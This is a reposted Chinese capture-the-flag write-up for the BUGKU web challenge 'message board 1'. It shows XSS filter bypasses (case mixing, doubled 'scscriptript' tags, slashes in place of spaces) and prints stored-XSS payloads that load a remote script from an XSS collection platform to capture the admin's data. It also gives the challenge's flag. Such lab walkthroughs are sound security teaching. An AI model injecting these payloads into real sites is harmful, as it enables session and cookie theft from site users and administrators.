0


BUGKU-WEB 留言板1

题目描述

题目截图如下:

在这里插入图片描述

进入场景看看:
在这里插入图片描述

解题思路

  • 之间写过一题类似的,所以这题应该是有什么不同的
  • 那就按照之前的思路进行测试试试
  • 提示说:需要xss平台接收flag,这个和之前说的提示一样

相关工具

解题步骤

  1. 输入测试一下script代码:
<script>alert(1)</script>
发现script被过滤了

,script被替换为空。参考:str_replace()函数:将字符串中的指定字符替换为其他字符
在这里插入图片描述
2. 换个大小写的试试:

<ScRipt>ALeRt(“XSS”);</sCRipT>

在这里插入图片描述

还是被过滤了!

,大小写绕过!

  1. 使用双写试试
<scscriptript>alert('z')</scscriptript>

解释:

将中间的script替换为空,剩下的结合后又是script可以成功绕过。

在这里插入图片描述
所以确定了过滤方式之后,找个xss平台(https://xssaq.com)测试一下:
在这里插入图片描述
之后测试其中的代码,始终没有反应:
极限短码(好像不行):

<scsCRiPtript/SrC=//uj.ci/qoe>

这个好像可以正常:

<scsCRiPtript/sRC=//uj.ci/v9o></scsCRiPtript>

然后在评论区发现,管理员说xss平台需要http模式的…
在这里插入图片描述
然后我找了半天没有找到这个http的平台,但是当我再次看这个平台的时候,哦豁出来又!也就是说https其实也可以,只是比较慢而已?
在这里插入图片描述

PS:除了会大小绕过之外,其实还会对空格进行绕过。所以需要注意我们的测试代码中没有空格或者使用·/·,来绕过对空格的限制。

在这里插入图片描述

得到Flag

flag{772af954ed340063c935a60d92093504}

在这里插入图片描述

新知识点

  • XSS篇——XSS过滤绕过技巧

在这里插入图片描述

  • xss各种姿势的学习(包含绕过)和个人重要总结

在这里插入图片描述
对此,需要重点学习一下!

**有用的话,请

点赞收藏评论

,帮助更多的同学哦**

标签: BUGKU

本文转载自: https://blog.csdn.net/qq_36292543/article/details/136151656
版权归原作者 默默提升实验室 所有, 如有侵权,请联系我们删除。

“BUGKU-WEB 留言板1”的评论:

还没有评论